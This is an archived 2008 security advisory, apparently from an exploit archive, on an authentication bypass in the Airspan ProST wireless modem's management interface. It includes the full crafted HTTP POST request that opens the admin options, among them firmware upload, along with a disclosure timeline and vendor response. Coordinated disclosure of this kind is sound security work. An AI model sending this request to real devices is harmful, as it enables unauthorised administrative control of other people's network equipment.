exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

airspan-bypass.txt

airspan-bypass.txt
Posted Mar 14, 2008
Authored by Francis Lacoste-Cordeau

The Airspan ProST Modem suffers from a management authentication bypass vulnerability. Exploitation details provided.

tags | exploit, bypass
SHA-256 | c3c55ed83abf8972023d3730ae3f273cda60b38d9dae9d84b0d3a7dd7b1be694

airspan-bypass.txt

Change Mirror Download
Topic:              Airspan ProST Modem Management Authentication Bypass Vulnerability
Announced: 2008-03-13
Product: Airspan ProST Antenna
Vendor: http://www.airspan.com/
Impact: Remote shell access
Affected product: Airspan ProST with firmware < 6.5.40.0, Hardware rev < 4.1
Credits: Francis Lacoste-Cordeau

I. BACKGROUND

Airspan is a worldwide leader in broadband wireless with over 400 customers
in more than 100 countries. As a founding member of the WiMAX forum, Airspan
has led the way in WiMAX, being among the first wave of companies to achieve
certification for its Base Station and End User Devices.

http://www.airspan.com/

II. DESCRIPTION

Remote exploitation of an authentication bypass vulnerability in Airspan ProST
Modem management allows attackers to access all options available in administration panel.

This issue is due to a failure of the application to properly handle access validation
functionality. The access gained through this issue grants admin privileges.

III. EXPLOITATION

The attacker have to craft a malicious request.

Example:
POST /process_adv/ HTTP/1.1
Host: 10.0.0.1
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

DialogText=&Advanced=1


It will display options page number #1, which is Software Download for Firmware upgrade.
You can increment 'Advanced' value to see others options.


IV. WORKAROUND

There's actually no workaround of this issue.

V. VENDOR RESPONSE

Airspan has addressed this vulnerability and will fix this problem with a firmware update.

VI. DISCLOSURE TIMELINE

15/10/2007 Initial vendor notification
16/10/2007 Initial vendor response
13/03/2008 Coordinated public disclosure

VI. CREDIT

Francis Lacoste-Cordeau(admin@nexact.net) is credited with discovering this vulnerability.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close